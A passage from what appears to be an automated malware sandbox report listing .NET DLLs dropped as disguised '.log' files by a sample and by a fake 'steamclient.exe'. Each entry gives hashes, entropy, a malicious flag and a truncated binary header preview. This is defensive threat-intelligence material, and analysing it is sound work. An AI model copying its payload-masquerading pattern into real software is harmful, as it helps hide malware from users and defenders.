                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VHHMJZBT.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\VrbgQkMX.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VsDGsRfn.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VwwfTkqf.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VxBoFvwp.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VxjNZniX.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\WucwbvLj.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XXkOusIo.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\XsgfYcsu.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YGOFIxBr.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YKeEIjtU.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YwOfwePf.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ZHGMdjIP.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\aEhUzjWJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\aSHMiLLR.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\aUovvDkq.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\asCFMbmi.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\bhuvEsaX.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\bzdouunp.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\cRJFZrfS.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\cpPftzHM.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
